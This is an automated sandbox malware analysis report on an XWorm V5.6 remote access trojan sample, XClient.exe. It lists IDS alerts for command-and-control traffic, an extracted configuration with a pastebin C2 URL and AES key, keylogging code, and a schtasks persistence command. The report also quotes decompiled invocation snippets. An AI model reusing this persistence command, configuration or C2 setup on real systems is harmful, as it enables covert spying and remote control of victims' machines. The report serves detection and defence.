              2025-01-03T14:07:26.053811+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:07:55.943481+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:25.963366+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:55.981477+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:25.944410+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:55.941742+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:25.942800+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:55.942781+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:56.325098+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T14:08:19.131552+010028531931Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: XClient.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\XClient.exeAvira: detection malicious, Label: TR/Spy.Gen
              Found malware configuration
              Source: XClient.exeMalware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/c8qJf1m5"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\XClient.exeReversingLabs: Detection: 73%
              Source: C:\Users\user\AppData\Roaming\XClient.exeVirustotal: Detection: 68%Perma Link
              Multi AV Scanner detection for submitted file
              Source: XClient.exeReversingLabs: Detection: 73%
              Source: XClient.exeVirustotal: Detection: 68%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\XClient.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: XClient.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: XClient.exeString decryptor: https://pastebin.com/raw/c8qJf1m5
              Source: XClient.exeString decryptor: <123456789>
              Source: XClient.exeString decryptor: <Xwormmm>
              Source: XClient.exeString decryptor: XWorm V5.6
              Source: XClient.exeString decryptor: USB.exe
              Source: XClient.exeString decryptor: %AppData%
              Source: XClient.exeString decryptor: XClient.exe
              Source: XClient.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: XClient.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49731 -> 87.120.125.47:7000
              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.125.47:7000 -> 192.168.2.4:49731
              Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49731 -> 87.120.125.47:7000
              Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 87.120.125.47:7000 -> 192.168.2.4:49731
              Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49731 -> 87.120.125.47:7000
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://pastebin.com/raw/c8qJf1m5
              Connects to a pastebin service (likely for C&C)
              Source: unknownDNS query: name: pastebin.com
              Source: global trafficTCP traffic: 192.168.2.4:49731 -> 87.120.125.47:7000
              Source: global trafficHTTP traffic detected: GET /raw/c8qJf1m5 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
              Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
              Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: global trafficHTTP traffic detected: GET /raw/c8qJf1m5 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: pastebin.com
              Source: XClient.exe, 00000000.00000002.4114219369.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: XClient.exe, 0000000A.00000002.3557691921.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/c8qJf1m5
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49730 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to log keystrokes (.Net Source)
              Source: XClient.exe, XLogger.cs.Net Code: KeyboardLayout
              Source: XClient.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
              Source: C:\Users\user\Desktop\XClient.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: XClient.exe, type: SAMPLEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: XClient.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.0.XClient.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: 0.0.XClient.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\XClient.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\XClient.exeCode function: 0_2_00007FFD9B88A3120_2_00007FFD9B88A312
              Source: C:\Users\user\Desktop\XClient.exeCode function: 0_2_00007FFD9B88CDF40_2_00007FFD9B88CDF4
              Source: C:\Users\user\Desktop\XClient.exeCode function: 0_2_00007FFD9B8895660_2_00007FFD9B889566
              Source: C:\Users\user\Desktop\XClient.exeCode function: 0_2_00007FFD9B8805B80_2_00007FFD9B8805B8
              Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 3_2_00007FFD9B8B0C5E3_2_00007FFD9B8B0C5E
              Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 7_2_00007FFD9B890C5E7_2_00007FFD9B890C5E
              Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 9_2_00007FFD9B8B0C5E9_2_00007FFD9B8B0C5E
              Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 10_2_00007FFD9B8A0C5E10_2_00007FFD9B8A0C5E
              Source: XClient.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: XClient.exe, type: SAMPLEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: XClient.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.0.XClient.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 0.0.XClient.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: XClient.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe, Settings.csBase64 encoded string: 'ZlD002faNX/VP8ZhkqGXGsdkCkVxk0o/fndQ1CBZ/1mwdtfiAOqqPiDC7p60Ppli', 'T6WVOL3r5tFWPRdyqM02J6v5zc+c8ThmALUekuoVCmskM7E9HuB2ltVG/MtLaVwD', 'M82l2dzmQkcd3ImjFHBM1mL1b+pEkXJRMKTEYK0m0GnJExl+4lrlbS5JIWqWxle7', 'm3HjZ4Cb5qRguCifeAFlU8qxLDI8upw0JU2uLuL8ay/Xu0ptaRRmcgZj1myg/cow'
              Source: XClient.exe.0.dr, Settings.csBase64 encoded string: 'ZlD002faNX/VP8ZhkqGXGsdkCkVxk0o/fndQ1CBZ/1mwdtfiAOqqPiDC7p60Ppli', 'T6WVOL3r5tFWPRdyqM02J6v5zc+c8ThmALUekuoVCmskM7E9HuB2ltVG/MtLaVwD', 'M82l2dzmQkcd3ImjFHBM1mL1b+pEkXJRMKTEYK0m0GnJExl+4lrlbS5JIWqWxle7', 'm3HjZ4Cb5qRguCifeAFlU8qxLDI8upw0JU2uLuL8ay/Xu0ptaRRmcgZj1myg/cow'
              Source: XClient.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: XClient.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: XClient.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: XClient.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/3@1/2
              Source: C:\Users\user\Desktop\XClient.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeMutant created: NULL
              Source: C:\Users\user\Desktop\XClient.exeMutant created: \Sessions\1\BaseNamedObjects\lEEsdQo4zb5soE9b
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
              Source: XClient.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: XClient.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\XClient.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: XClient.exeReversingLabs: Detection: 73%
              Source: XClient.exeVirustotal: Detection: 68%
              Source: C:\Users\user\Desktop\XClient.exeFile read: C:\Users\user\Desktop\XClient.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\XClient.exe "C:\Users\user\Desktop\XClient.exe"
              Source: C:\Users\user\Desktop\XClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe C:\Users\user\AppData\Roaming\XClient.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe C:\Users\user\AppData\Roaming\XClient.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe C:\Users\user\AppData\Roaming\XClient.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe C:\Users\user\AppData\Roaming\XClient.exe
              Source: C:\Users\user\Desktop\XClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"Jump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\XClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
              Source: XClient.lnk.0.drLNK file: ..\..\..\..\..\XClient.exe
              Source: XClient.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: XClient.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: XClient.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: XClient.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: XClient.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: XClient.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
